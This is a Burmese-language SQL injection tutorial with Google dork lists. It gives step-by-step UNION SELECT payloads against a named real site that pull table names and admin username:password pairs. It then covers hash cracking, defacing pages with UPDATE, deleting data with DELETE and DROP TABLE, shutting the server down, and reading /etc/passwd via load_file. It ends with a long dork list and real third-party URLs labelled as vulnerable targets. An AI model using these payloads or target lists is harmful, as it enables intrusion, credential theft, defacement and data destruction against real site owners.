လ႕ ြကးစျာသမးဆညးထာတ႔ Data ေတျက ရယႏငးပါတယး... အနညးငယးရႈပးေထျ ေနမြာၿဖစးတ႔အတျကး

နနေလ အထဂရၿပၿပေတာ ေလလာၾကညးပါ။ ေအာကးပငးမြာ လကးေတျ႔စမးလ႔ရေအား site link န႔ တကျ

ေဖားၿပေပထာပါတယး။

---အာနညးခကး

အမြာမာ ရြာေဖျစစးေဆၿခငး---

Site တစးခကရြာလကးမယး...

In PHP ==>>

www.site.com/article.php?id=5

id

variable assign လပးထာတ႔ ေနာကးနာက ' (apostrophe) ေလတစးခက

ထညးလကးပါမယး..

www.site.com/article.php?id=5'

ဒလလ

စမးတ႔ေနရာမြာ

Integer Based

www.site.com/script.php?param=36'

www.site.com/script.php?param='36'

www.site.com/script.php?param=(12+24)

[url=http://www.site.com/script.php?param=%]www.site.com/script.php?param=%[/url]

www.site.com/script.php?param=36'a

http://www.site.com/article.php?id=5


http://www.site.com/script.php?param=36

http://www.site.com/script.php?param=%2736

http://www.site.com/script.php?param=%2812+24

http://www.site.com/script.php?param=36%27a

String Based

www.site.com/script.php?param=Text'--

www.site.com/script.php?param=Te'+'xt

[url=http://www.site.com/script.php?param=Tex%]www.site.com/script.php?param=Tex%[/url

]

ဆၿပရြပါတယး.. အဆငးေၿပသလ စမးသပးႏငးပါတယး...

အကယး၍ ၄ငးရ႕ site က vulnerable မၿဖစးဘဆရငး ပမြနးအတငး page loading လပးသျာပါလမးမယး..

အ႔လမဟတးပ query string filtering မရြဘဆရငး "MySQL Syntax Error By '5'' In Article.php on line

15." သမဟတး Check the correct MySQL version သ႔မဟတး MySQL Fetch error သ႔မဟတးပါက

ဘာမြမေပၚပ page အၿဖၾကသာေပၚေနပါလမးမယး... ဒါဆရငး ဒ site က vulnerable ၿဖစးေနပါတယး

အကယး၍ ' ၿဖငး မရလြငး ေအာကးပါအတငး union select 1-- ဆတာကသႏငးပါတယး။


union select 1--

In ASP

==>>

အထကးပါနညးအတငး

http://www.site.com/index.asp?id=5

ဆရငး

ေနာကးက ' (apostrophe) ေလထညးၿပစမးႏငးပါတယး။

http://www.site.com/index.asp?id=5'

ဒါဆရငး

Microsoft

OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC

SQL Server Driver][SQL Server]Syntax error converting the nvarchar

http://www.site.com/script.php?param=Text%27--

http://www.site.com/script.php?param=Te%27+%27xt


http://www.site.com/index.asp?id=5

http://www.site.com/index.asp?id=5%27

value 'table1' to a column of data type int.

/index.asp, line 5

ဆတ႔

error မေပၚေနတတးၿပ ASP, JSP, CGI, န႔ PHP web pages ေတျမြာ

စမးသပးႏငးပါတယး။

အကယး၍ URL မြာ မေပၚတ႔ parameters မဆရငး ၄ငးတ႔ရ႕ login page, search page, feedback

လေနရာမေတျက ရြာႏငးပါတယး.. တစးခ႕ html page ေတျက POST command န႔ ASP page က

ပ႔ေဆာငးေပတ႔ parameters သထာတတးပါတယး.. ဒါဆရငးေတာ ၄ငးတ႔ရ႕ HTML source code ထက

ငးေရာကးပါ။ ၿပရငး "FORM" tag ကရြာလကးပါ ...

ဥပမာ

<FORM action=Search/search.asp

method=post>

<input type=hidden name=A value=C>

</FORM>

ဒ <FORM></FORM>

ႏြစးခၾကာက ၿဖစးႏငးေၿခေတျပါ။

<FORM

action=http://duck/Search/search.asp method=post>

<input

type=hidden name=A

value='a' or 1=1--">

</FORM>

value မြာ အေပၚကအတငး BYPASSING LOGINS မြာသသလ စမးသပးၿပရြာေဖျႏငးပါတယး။

---Columns

အေရအတျကးရြာေဖျၿခငး---

‘order by’ ကအသၿပၿပ Columns မာက ရြာေဖျမြာၿဖစးပါတယး.. URL query ကေအာကးပါတငး

ရကးထညးလကးပါမယး... '/*' သ႔မဟတး '--" ဆတာေလသလ႔ရပါတယး..

www.site.com/article.php?id=5 order by 1/*

အမြာမေပၚဘဆရငး ေနာကးတစးခါ 2 ဆၿပတကာ ရကးထညးပါမယး


ယခအခနးအထ

အမြာမေပၚေသဘဆရငး ေနာကးတစး ထပးၿပတပါမယး.. ဒလတတၿပ

အမြာေပၚလာတ႔အထ ရြာေဖျရမြာၿဖစးပါတယး...


အခ 3 ကေရာကးတ႔အခါ အမြာေတျ႔တယးဆရငး ဒါဆရငး ကၽျနးေတားတ႔ Columns ႏြစးခရြတယးဆတာ

သသျာပါၿပ... ဒလနညးန႔ Column ေတျက တစးဆငးၿခငးရြာေဖျရပါတယး...

ေနာကးတစးခ ပန႔ တကျ ရြာေဖျၾကညးရေအာငး

http://sbisa.org/circle.php?id=26

ကၾကညးမယး..


ရ႕ value ေနာကးမြာ ' ဆတ႔ (apostrophe) တစးခထညးလကးပါမယး..






Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

/home/sbisaor/public_html/circle.php on line 10 ဆတ႔ error

တစးခေတျ႔ပါလမးမယး..

ဒါဆရငးေသခာတယး.. SQL error တစးခတကးေနၿပ... တတကကေၿပာရရငး DB Server က MySQL

OK, ဒါဆရငး ကၽျနးေတားတ႔ Columns အေရအတျကးရြာမယး...

http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒအထအဆငးအဆငးရြာတယး... error

မၿဖစးေသဘ

7 အထေရာကးတ႔အခါမြာေတာ error ေတျ႔တယးဆရငး ဒါဟာ 6 Columns ရြတယး...

ဒါဆရငးေနာကးထပး UNION SELECT ALL ဆတ႔ statement တစးခကသမယး..

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆၿပရကးထညးလကးမယး..

ဒါဆရငး 2,3,4 ဆတာၿပမယး.. ဒအပငးေတျက data ေတျသမးဆညးထာတ႔ Columns ေတျၿဖစးတယး...

---MySQL version ရြာၿခငး---

ဒ Injection မြာ MySQL Version က checking လပးဖ႔လပါတယး... . Version အာ Checking လပးရနး

@@version သ႔မဟတး version() functions ေတျကသေပရပါမယး.. အခ @@version က

data ေတျသမးဆညးထာတ႔ column မြာထညးၿပ MySQL version ကစစးမယး..

http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--

http://sbisa.org/circle.php?id=-26



သ႔မဟတး

http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--

ကသႏငးပါတယး.. တခါတစးေလမြာ အထကးပါနညးအတငးက error ေတျၿဖစးတတးတ႔အတျကး unhex(hex())

ကသေပရပါမယး..

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--

ဒါဆရငး Server မြာ အသၿပေနတ႔ MySQL ရ႕ version ကေဖားၿပေပသျာပါလမးမယး...

အကယး၍ user တ႔ ၊ database တ႔က check ခငးတယးဆရငး ေအာကးပါတငး checking

လပးႏငးပါတယး..

www.site.com/article.php?id=5 UNION ALL SELECT

user(),2/*


database(),2/*

ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--

---MySQL 5 ႏြငးအထကး injection---

အခကၽျနးေတားတ႔ ရတာ MySQL version 5.0.90 ၿဖစးပါတယး... MySQL version 5 မြာ

information_schema ဆတ႔ အသငးတ႔ funtion တစးခပါငးၿပ ၄ငးက လကးရြ DB server ရ႕ tables န႔

columns ေတျက ထနးသမးထာတာၿဖစးပါတယး...

Tables ေတျကရယရနး table_name from information_schema.tables ဆတာကသသလ

Columns ေတျကရယရနး column_name from information_schema.columns






ဆတာကသရပါမယး..

ေနာကးတစးခကေတာ ဒ site အေပၚမြာ ၿမငးရေအာငးလ႔

group_concat(table_name) က Tables ေတျအတျကးန႔

group_concat(column_name)က Columns ေတျအတျကးသေပရပါတယး...

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from

information_schema.tables where table_schema=database()--

ေစာေစာက ကၽျနးေတားတ႔ MySQL version က @@version အစာ unhex(hex()) န႔သခ႔ရတယးဆရငး အခ

Table န႔ Column ကရြာတ႔အခါမြာလညး အ႔လပ သေပရပါတယး။

http://sbisa.org/circle.php?id=-26 union select all

1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where

table_schema=database()--

ေနာကးထကးတစးခါ ကၽျနးေတားတ႔ Columns ေတျကၾကညးမယးဆရငး

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from

information_schema.columns where table_schema=database()--

ဒါဆရငး DB ထက table ေတျက ေဖားၿပေပပါၿပ... အခ ကၽျနးေတားတ႔ဒ tables ေလေတျက စနစးတက

မြတးသာထာပါမယး... ေနာကးတစးဆငးတကးကာ ကၽျနးေတားတ႔လခငးတ႔ user name န႔ password ေတျ

သမးထာတ႔ table ကၾကညးပါမယး...

group_concat ကပ ဆကးလကးသပါမယး.. ဒါေပမ႔ ကၽျနးေတားတ႔ လခငးတ႔ username,

password ေတျသမးထာေလာကးတ႔ columns ေတျထက စစးထတးယမြာပါ။ ဒေနရာမြာ ကၽျနးေတားတ႔

မြနးထာတ႔ table အမညးက from information_schema.tables

where table_schema=database-- ေနရာမြာ ထညးသျငးမြာၿဖစးပါတယး..




0x3a ဆတာကေတာ ":" ရ႕ hex code ပါ။

http://sbisa.org/circle.php?id=-26 union select all

1,2,3,group_concat(username,0x3a,password),5,6 from

admin--

ဒါဆရငးေတာ မမတ႔လခငးတ႔ username န႔ password ကရသျာပါၿပ... ရရြထာတ႔

password ဟာ plaintext ၿဖစးတယးဆရငးေတာ ထပးၿပေခါငးရႈပးစရာမလေတာဘေပါ႔

တစးခ႕ကေတာ password hashed လပးထာတ႔ အတျကး ၄ငးတ႔အာ hash cracker ေတျန႔

ေၿဖထတးေပရပါလမးမယး..

ဥပမာ

admin:3a39ec8cd0c399cc247936ad5e0b6927

John The Ripper

www.openwalls.org

Cain

& Able

www.oxid.it

hash လပးထာတ႔ password ေတျသာဆရငးေတာ အနညးငယးခကးသျာပါလမးမယး... အထကးပါ hash က

crack လပးလကးရငး adminlanetCreator ဆၿပရပါမယး..

က ဒါဆရငးေတာ admin န႔ password ကရၿပဆရငး ကယးလပးခငးသလလပးေပေတာ..

---MySQL version 4 injection---

MySQL version က 4 ၿဖစးမယးဆရငး version 5 လ information_schema.tables and

information_schema.columns က support မလပးတ႔အတျကး table name န႔ column name ေတျက

guess လပးရပါတယး... ေနာကးတစးခက error message အေပၚမြာအေၿခခၿပခနး႔မြနးရတာပါ။ The error


http://www.openwalls.org/

http://www.oxid.it/

reports pnc_article in the error ဆရငး pnc ဆတ႔ prefix ကသထာတ႔အတျကး table name က pnc

ဆတာ ခနး႔မြနးလ႔ရႏငးပါတယး။

ဥပမာ ကၽျနးေတားက table name က user ဆၿပ ခနး႔မြနးလကးမယး.. ဒါဆရငး

ေအာကးပါအတငးရကးထညးေပၾကညးမယးဆပါစ႔

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*

အထကးပါအတငးရကးထညးလကးလ႔ error ၿဖစးေနတယးဆရငး ဒါဟာ table မရြလပ... ေနာကးတစးခါထပးၿပ

guess လကးပါ... table name က tbluser ဆၿပထာလကးပါမယး..

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*

ဒလနညးန႔ table name ေတျ column ေတျအာ ခနး႔မြနးၿပထညးသျာရပါလမးမယး...

www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*

www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*

www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*

www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*

www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM

tbluser/*

ေနာကးဆ username န႔ password က ရတ႔အထေပါ႔...

Table name အခ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.

ဒါဟာ Injection ရ႕ လ႕ ြကးထာတ႔ Data မာက ရယတ႔အပငးၿဖစးပါတယး... Admin ရ႕ username &

password ရၿပဆရငး Admin Login Page မြာရကးထညးရပါမယး... Joomla ဆရငး /administrator န႔

Wordpress ဆရငး /wp-admin ၿဖစးပါတယး.. အခ႕ site ေတျက admin panel ကရြာရခကး ေနပါလမးမယး..

ဒါဆရငး admin panel finder ေလေတျကသၿပရြာေဖျရပါလမးမယး...

Admin Panel Finder








http://www.planetcreator.net/planetc...inpanelfinder/

န႔ရြာႏငးပါတယး။

---Site အာၿပငးဆငးၿခငး ---

အခ႕ေသာ Site ေတျက admin ရ႕ password ကရေပမ႔ admin panel ကရဖ႔ခကးခၿခငး၊ ရြာမေတျ႔ၿခငးေတျန႔

ၾကရတတးပါတယး... ဒလေနရာမြာ SQL commands ေတျကသၿပ အထက site ရ႕ contents

ေတျကၿပငးဆငးေၿပသျာရမြာၿဖစးပါတယး...

ဒါေလေတျက အေရပါတ႔ command ေလေတျပါ

UPDATE:It is used to edit infos already in the db without deleting any rows.

DELETE:It is used to delete the contents of one or more fields.

DROP: It is used completely delete a table & all its associated data.

UPDATE:-


ဆၾကပါစ႔ကၽျနးေတားတ႔ရ႕ query က ေအာကးပါအတငးၿဖစးမယးဆရငး

SELECT title,data,author FROM article WHERE id=5

(table name န႔ column ေတျက အထကးပါအတငးရြာေဖျက ထညးေပရတာၿဖစးပါတယး) ေအာကးပါအတငး

site ကၿပငးေပသျာပါမယး...

www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*

ခကးဆနးဆနးေလ ထကးၿပ အရစးတကးလကးမယးဆရငး

www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY

SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*

သတးမြတးထာတ႔ page ေၿပာငးလၿပ update လပးခငးတယးဆရငးေတာ ေအာကးပါအတငး

ရကးထညးေပရပါတယး..

http://www.planetcreator.net/planetc...inpanelfinder/




www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value

3' WHERE id=5/*

DELETE:- DB Server ထကေန အၿမတမးဖကးပစးေတာမယးဆရငး DELETE command ကသသျာပါမယး..

www.site.com/article.php?id=5 DELETE title,data,author FROM article/*

သတးမြတးထာတ႔ page က delete လပးခငးတယးဆရငး ေအာကးပါ table name ရ႕ ေနာကးထမြ WHERE န႔

page id ကထညးသျငးသျာရပါမယး...

www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*

ဒတစးခကေတာ DROP TABLE ပါ... Table အလကး ဖကးခငးတယး ဆရငးေတာ DROP Table န႔

table name ကဆၿပသပါမယး...

www.site.com/article.php?id=5 DROP TABLE article/*

ဒအတငးဖကးရငး table ေတျေကာ အထမြာပါတ႔ contents ေတျေကာ အာလ ပကးသျာပါလမးမယး...

SHUTTING DOWN MySQL SERVER:

www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;

LOADFILE:

Server အထက .htaccess, .htpasswd ေတျန႔ password files ေတျၿဖစးတ႔ etc/passwd စသညး

ဖငးေတျက ယခငးတယးဆရငးေတာ LOADFILE ကသရပါတယး... ဒါကအသေတာနညးပါတယး....

www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*

အကယး၍ hex ေတျန႔ဆရငးေတာ ေအာကးပါတငး သပါမယး..








load_file(0x272F6574632F70617373776427)

ဒါက Hex based SQL Injection လ႔လညးေခၚႏငးပါတယး..

* SELECT

LOAD_FILE(0x633A5C626F6F742E696E69)

ဒါဟာ server ရ႕ c:\boot.ini က

ဆျယေပပါလမးမယး..

---MySQL ROOT---

MySQL

version 5 န႔အထကးမြာ mysql.user ဆတ႔ table တစးခဟာ MySQL servers

ေတျမြာရြပါတယး... အထမြာ hash လပးထာတ႔ Password န႔ username ေတျပါ ငးပါတယး... ၄ငးအထက

hash ဟာ mysqlsha1 ၿဖစးတ႔အတျကး John The Ripper န႔ crack လပးဖ႔ခကးပါမယး..

www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from

mysql.user/*

ဒအတျကး InsidePro Password Recovery Software ကသလ႔ရပါတယး..

http://www.insidepro.com

---အသငးတ႔ MySQL commands အခ႕ပါ..---

ABORT — abort the current transaction

ALTER DATABASE — change a database

ALTER GROUP — add users to a group or remove users from a group

ALTER TABLE — change the definition of a table

ALTER TRIGGER — change the definition of a trigger



http://www.insidepro.com/

ALTER USER — change a database user account

ANALYZE — collect statistics about a database

BEGIN — start a transaction block

CHECKPOINT — force a transaction log checkpoint

CLOSE — close a cursor

CLUSTER — cluster a table according to an index

COMMENT — define or change the comment of an object

COMMIT — commit the current transaction

COPY — copy data between files and tables

CREATE AGGREGATE — define a new aggregate function

CREATE CAST — define a user-defined cast

CREATE CONSTRAINT TRIGGER — define a new constraint trigger

CREATE CONVERSION — define a user-defined conversion

CREATE DATABASE — create a new database

CREATE DOMAIN — define a new domain

CREATE FUNCTION — define a new function

CREATE GROUP — define a new user group

CREATE INDEX — define a new index

CREATE LANGUAGE — define a new procedural language

CREATE OPERATOR — define a new operator

CREATE OPERATOR CLASS — define a new operator class for indexes

CREATE RULE — define a new rewrite rule

CREATE SCHEMA — define a new schema

CREATE SEQUENCE — define a new sequence generator

CREATE TABLE — define a new table

CREATE TABLE AS — create a new table from the results of a query

CREATE TRIGGER — define a new trigger

CREATE TYPE — define a new data type

CREATE USER — define a new database user account

CREATE VIEW — define a new view

DEALLOCATE — remove a prepared query

DECLARE — define a cursor

DELETE — delete rows of a table

DROP AGGREGATE — remove a user-defined aggregate function

DROP CAST — remove a user-defined cast

DROP CONVERSION — remove a user-defined conversion

DROP DATABASE — remove a database

DROP DOMAIN — remove a user-defined domain

DROP FUNCTION — remove a user-defined function

DROP GROUP — remove a user group

DROP INDEX — remove an index

DROP LANGUAGE — remove a user-defined procedural language

DROP OPERATOR — remove a user-defined operator

DROP OPERATOR CLASS — remove a user-defined operator class

DROP RULE — remove a rewrite rule

DROP SCHEMA — remove a schema

DROP SEQUENCE — remove a sequence

DROP TABLE — remove a table

DROP TRIGGER — remove a trigger

DROP TYPE — remove a user-defined data type

DROP USER — remove a database user account

DROP VIEW — remove a view

END — commit the current transaction

EXECUTE — execute a prepared query

EXPLAIN — show the execution plan of a statement

FETCH — retrieve rows from a table using a cursor

GRANT — define access privileges

INSERT — create new rows in a table

LISTEN — listen for a notification

LOAD — load or reload a shared library file

LOCK — explicitly lock a table

MOVE — position a cursor on a specified row of a table

NOTIFY — generate a notification

PREPARE — create a prepared query

REINDEX — rebuild corrupted indexes

RESET — restore the value of a run-time parameter to a default value

REVOKE — remove access privileges

ROLLBACK — abort the current transaction

SELECT — retrieve rows from a table or view

SELECT INTO — create a new table from the results of a query

SET — change a run-time parameter

SET CONSTRAINTS — set the constraint mode of the current transaction

SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier

of the current session

SET TRANSACTION — set the characteristics of the current transaction

SHOW — show the value of a run-time parameter

START TRANSACTION — start a transaction block

TRUNCATE — empty a table

UNLISTEN — stop listening for a notification

UPDATE — update rows of a table

VACUUM — garbage-collect and optionally analyze a databasee

SQL

Injection မြာ အသၿပတ႔ အေၿခခေတျပ ရြပါေသတယး... ဒထကးမာတ႔ functions ေတျအမာၾကရြသလ

ဒထကးပၿပနကးနတ႔ အသၿပပေတျရြပါတယး... ေလလာတ႔သေတျအေနန႔ မမတ႔ကယးတငး SQL commands

ေတျက အရငးဆ ကယးတငးစမးစစးၿပ မမတ႔ရ႕ SQL commands အသၿပမႈအရညးအခငးက

ၿမငးတငးသငးပါတယး။

-----------------------------------------------------------------------------------------------------------------

ဒေလာကးဆရငး SQL Injection သေဘာတရာေတျကနာလညးေလာကးပထငးပါတယး။

နးခခကး - အထကးပါ SQL Injection စာမာက က BrB (planet creator)ထမြတကးရကးကယထာပါသညး

SQL Error ဖစးေနေသာ Website မာရြာနညး

SQL ယေပါကး Vuln ရြေနတဆကးေတျက Google Dork သပရြာနငးပါတယး။Dork ဆတာ ကေနားတလအပး

တ Result ေတျက တစတေထမြာသသသနးသနးတရာစပရြာေပတ ကးဆကးရြာစာသာလေပာရမလာပ။

ကေနားေအာကးမြာ Dork ေတျ အမာႀကစေပထာပါတယး။ရြာပ SQL Error ဖစးေနတ ဆကးတစးခက

Target ထာကာ က Brb ရနညးဖစးဖစး၊အခာနညးမာဖစးဖစးန Attack လပးနငးပါတယး။

Google Dork For SQL Injection မာစစညးမြ

by 3thic0kiddi3

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurllay_old.php?id=

inurl:declaration_more.php?decl_id= inurlageid=

inurl:games.php?id=

inurlage.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

http://allitemz.blogspot.com/2012/02/largest-collection-of-google-dork-for.html

http://3.bp.blogspot.com/-6eavjntttc4/T0ZRz8tuH7I/AAAAAAAAABY/4DkqLhaGbvQ/s1600/Google+-vert.jpg

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurltray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurlreview.php?id=

inurl:loadpsb.php?id=

inurlpinions.php?id=

inurl:spr.php?id=

inurlages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurlarticipant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurlrod_detail.php?id=

inurl:viewphoto.php?id=


inurlerson.php?id=

inurlroductinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=


inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurlrofile_view.php?id=

inurl:category.php?id=

inurlublications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurlrod_info.php?id=

inurl:shop.php?do=part&id=


inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurlroduct.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=

inurl:shopping.php?id=

inurlroductdetail.php?id=

inurlost.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurlage.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurlroduct_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:tran******.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=


inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=




inurl:event.php?id=


inurl:sql.php?id=




inurl:ages.php?id=

inurl:material.php?id=




inurl:read.php?id=

inurl:viewapp.php?id=


inurl:rub.php?idr=

inurl:galeri_info.php?l=


inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=






inurl:rub.php?idr=


inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inur l: info.php?id=

inurl : pro.php?id=

inurl:index.php?id=





inurl:declaration_more.php?decl_id=

inurlageid=

inurl:games.php?id=

inurlage.php?file=




inurl:show.php?id=

inurl:staff_id=








inurl:game.php?id=




inurl:news.php?id=


inurl:event.php?id=


inurl:sql.php?id=



inurl:humor.php?id=




inurl:sem.php3?id=


inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=


inurlreview.php?id=



inurl:spr.php?id=

inurlages.php?id=





inurl:main.php?id=



inurl:read.php?id=




inurlerson.php?id=



inurl:view.php?id=




inurl:rub.php?idr=




inurl:index.php?=











inurlroduct.php?id=


inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=



inurlost.php?id=





inurl:theme.php?id=

inurlage.php?id=





inurl:tran******.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=








inurl:event.php?id=


inurl:sql.php?id=




inurl:ages.php?id=





inurl:read.php?id=



inurl:rub.php?idr=






inurl:story.php?id=

inurl:look.php?ID=






inurl:rub.php?idr=






inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:shop+php?id+site:fr "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() inurl:index.php?id=


inurl:login.asp

index of:/admin/login.asp



inurl:play_old.php?id=


inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=




inurl:show.php?id=

inurl:staff_id=






inurl:Stray-Questions-View.php?num=


inurl:game.php?id=




inurl:news.php?id=


inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=



inurl:humor.php?id=


inurl:ogl_inet.php?ogl_id=



inurl:sem.php3?id=


inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=


inurl:preview.php?id=


inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=



inurl:participant.php?id=


inurl:main.php?id=



inurl:read.php?id=

inurl:prod_detail.php?id=



inurl:person.php?id=

inurl:productinfo.php?id=


inurl:view.php?id=




inurl:rub.php?idr=




inurl:index.php?=

inurl:profile_view.php?id=


inurl:publications.php?id=



inurl:prod_info.php?id=


inurl:productinfo.php?id=



inurl:product.php?id=


inurl:ray.php?id=

inurl:produit.php?id=

inurl:produit.php?id=+site:fr inurl:pop.php?id=


inurl:productdetail.php?id=

inurl:post.php?id=





inurl:theme.php?id=

inurl:page.php?id=



inurl:product_ranges_view.php?ID=


inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=








inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=


inurl:preview.php?id=


inurl:pages.php?id=





inurl:read.php?id=



inurl:rub.php?idr=






inurl:story.php?id=

inurl:look.php?ID=




inurl:opinions.php?id=


inurl:rub.php?idr=






inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:index.php?id=






inurlageid=

inurl:games.php?id=

inurlage.php?file=




inurl:show.php?id=

inurl:staff_id=








inurl:game.php?id=




inurl:news.php?id=


inurl:event.php?id=


inurl:sql.php?id=



inurl:humor.php?id=




inurl:sem.php3?id=


inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=


inurlreview.php?id=



inurl:spr.php?id=

inurlages.php?id=





inurl:main.php?id=



inurl:read.php?id=




inurlerson.php?id=



inurl:view.php?id=




inurl:rub.php?idr=




inurl:index.php?=











inurlroduct.php?id=


inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=



inurlost.php?id=





inurl:theme.php?id=

inurlage.php?id=





inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=








inurl:event.php?id=


inurl:sql.php?id=




inurl:ages.php?id=





inurl:read.php?id=



inurl:rub.php?idr=






inurl:story.php?id=

inurl:look.php?ID=






inurl:rub.php?idr=






inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

အထကးပါ Dork မာထမြ မမအဆငးေပတ Dork နရြာပ စမးသပးနငးပါတယး။

SQL Error (Vuln) ရြေနေသာကးဘးဆကးမာစစညးမြ

http://www.registerforevent.rs/event.php?id=1191'

http://www.sedicifilm.it/games.php?id_cat3=61'

http://www.adas-fusion.eu/theme.php?id=2'

http://www.actforkids.com.au/news_full.php?id=111'

http://www.ezskincare.com/theme.php?id=1'

http://hcpoa.com/readnews.php?id=32'

http://www.reallymeansounds.com/events/event.php?id=477'

http://www.themackwoodgroup.com/view_product.php?id=1027120263040942700'

http://www.vacancesetmontagne.fr/theme.php?id=7'

http://www.inner-live.com/index.php?task=channels&action=view&channel_id=452'

http://www.super-buys.co.uk/shops.php?field1=127'

http://www.aportescriticos.com.ar/es/curriculum.php?id_cv=2'

http://www.vainerepaoliello.com.br/curriculum.php?id=7'

http://www.matamorosenred.com/ver_curriculum.php?id=23'

http://ultimatehomedesign.com/news-detail.php?id=312'

http://www.firagirona.com/participant.php?id=108&cl=5634'


http://www.ceripp.it/curriculum.php?id=1'

http://www.dentistry.co.uk/news/news_detail.php?id=1442'

